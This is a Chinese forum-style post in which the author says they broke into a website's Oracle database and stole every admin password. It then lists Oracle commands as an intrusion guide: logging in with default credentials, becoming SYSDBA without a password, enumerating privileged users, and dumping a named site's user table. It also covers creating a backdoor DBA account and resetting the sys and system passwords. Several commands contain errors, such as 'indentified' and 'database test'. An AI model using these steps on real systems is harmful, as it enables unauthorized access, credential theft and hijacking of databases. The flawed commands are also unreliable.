最近遇到一个使用了数据库的，在狂学+请教高手后终于搞到了网站后台管理界面的所有用户密码，我发现Oracle操作起来真是太麻烦，为了兄弟们以后少走些弯路，我把入侵当中必需的命令整理出来，一个星期的心血，版权所有，转载请注明作者。

1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

3、SQL>connect / as sysdba ;（as sysoper）或 connect internal/oracle AS SYSDBA ;(scott/tiger)

conn sys/change_on_install as sysdba;

4、SQL>startup; 启动数据库实例

5、查看当前的所有数据库

select * from v$database; 
select name from v$database; 
desc v$databases; 查看数据库结构字段

6、怎样查看哪些用户拥有SYSDBA、SYSOPER权限

SQL>select * from V_$PWFILE_USERS; 
Show user;查看当前数据库连接用户

7、进入test数据库：database test;

8、查看所有的数据库实例：

select * from v$instance；

如：ora9i

9、查看当前库的所有数据表：

SQL> select TABLE_NAME from all_tables; 

select * from all_tables; 

SQL> select table_name from all_tables where table_name like '%u%'; 

TABLE_NAME 

------------------------------ 

_default_auditing_options_ 

10、查看表结构：desc all_tables;

11、显示CQI.T_BBS_XUSER的所有字段结构：

desc CQI.T_BBS_XUSER;

12、获得CQI.T_BBS_XUSER表中的记录：

select * from CQI.T_BBS_XUSER;

13、增加数据库用户：(test11/test)

create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

14、用户授权

grant connect,resource,dba to test11; 

grant sysdba to test11; 

commit; 

15、更改数据库用户的密码：(将sys与system的密码改为test.)

alter user sys indentified by test; 

alter user system indentified by test;